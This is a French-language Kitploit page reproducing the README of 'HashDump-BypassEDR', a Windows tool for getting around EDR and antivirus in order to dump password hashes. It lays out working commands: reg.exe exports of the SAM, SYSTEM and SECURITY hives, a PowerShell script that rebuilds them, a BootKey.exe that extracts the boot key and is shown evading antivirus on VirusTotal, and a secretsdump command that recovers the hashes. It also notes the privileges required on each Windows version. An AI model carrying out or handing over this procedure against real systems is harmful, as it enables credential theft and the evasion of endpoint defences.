Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
HashDump-BypassEDR — Windows绕过EDR实现DumpHash | Kitploit
Outils/GitHubGitHub/aabysszg/hashdump-bypassedr
Password AttacksHash AnalysisIDS/IPS EvasionPost-ExploitationPenetration TestingRed Teaming
GitHubaabysszg/hashdump-bypassedr

HashDump-BypassEDR

Windows绕过EDR实现DumpHash

Voir le dépôt
25132il y a 22 joursVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

HashDump-BypassEDR

1# Aperçu du projet

Grâce à l'utilisation étendue du programme système Reg.exe, inscrit sur la liste blanche, cette méthode contourne avec ingéniosité les points d'interception des antivirus, permettant ainsi de contourner l'EDR pour réaliser un DumpHash.

D'après les tests effectués, cette méthode s'avère efficace sur les systèmes Windows, elle est simple à mettre en œuvre et présente une réelle valeur opérationnelle.

Articles pratiques sur ce projet :

  • Comment contourner l'EDR pour réaliser un DumpHash – Blog d'AabyssZG
  • Comment contourner l'EDR pour réaliser un DumpHash – Communauté cloud nationale de cybersécurité

Après la publication de l'article, aucune approche similaire n'a été trouvée dans les communautés nationale et internationale ; je pensais qu'il s'agissait d'une première mondiale. Cependant, d'après les commentaires de certains lecteurs, cette approche avait déjà été partagée à l'étranger par un expert : Dumping LSA secrets: a story about task decorrelation

Le code source et les releases de ce projet sont publiés sur GitHub. Ce partage n'a pas été facile ; si vous trouvez ce projet utile, n'hésitez pas à m'accorder une étoile (Star), merci infiniment !

2# Étapes clés

2.1 Première étape : exporter le fichier reg

Exécutez la commande suivante sur la machine cible pour exporter le fichier .reg :

root@kitploit:~
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg

2.2 Deuxième étape : restaurer les binaires en local

Téléchargez le fichier .reg de la première étape sur votre machine locale, puis exécutez le script PowerShell RegReduction.ps1 de ce projet pour restaurer les fichiers binaires :

root@kitploit:~
.\RegReduction.ps1

Remarque : après téléchargement du script depuis GitHub, son encodage par défaut est UTF-8 ; vous devez le convertir en ANSI (GB2312) à l'aide du Bloc-notes pour qu'il s'exécute correctement

powershell.png

2.3 Troisième étape : obtenir la BootKey

Exécutez le programme BootKey.exe sur la machine cible, dont le code source est le fichier BootKey.c de ce projet :

root@kitploit:~
BootKey.exe

BootKey.png

Test de contournement des antivirus (2026.5.10) : www.virustotal.com

Virustotal.png

2.4 Quatrième étape : obtenir le hash via secretsdump

root@kitploit:~
python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

HashOut.png

3# Notes sur les privilèges

Cette méthode comporte plusieurs opérations clés, mais seules deux étapes principales se déroulent sur la machine cible :

  • Exporter le contenu des ruches de registre critiques à l'aide de la commande reg.exe export ;
  • Exporter la BootKey du système à l'aide de BootKey.exe.

Des tests ont également été réalisés sur différents systèmes, voici les résultats :

  • Lors des tests effectués, l'exportation du registre avec la commande reg.exe export nécessite les privilèges SYSTEM sur Windows 10, Windows 11 et Windows Server 2025, tandis que sur Windows Server 2022 et versions antérieures, de simples privilèges administrateur suffisent (les privilèges SYSTEM ne sont pas requis). Si le fichier exporté avec la commande reg.exe export ne fait que 1 Ko, cela signifie que les privilèges sont insuffisants.
  • Lors des tests effectués, l'exportation de la BootKey avec BootKey.exe ne nécessite pas de privilèges administrateur, et la plupart des antivirus testés (tous ceux rencontrés jusqu'à présent) ne le détectent pas.

🙏 4# Merci à tous les experts

Stargazers

Stargazers repo roster for @AabyssZG/HashDump-BypassEDR

Forkers

Forkers repo roster for @AabyssZG/HashDump-BypassEDR

Star History

Star History Chart

Télécharger l’outil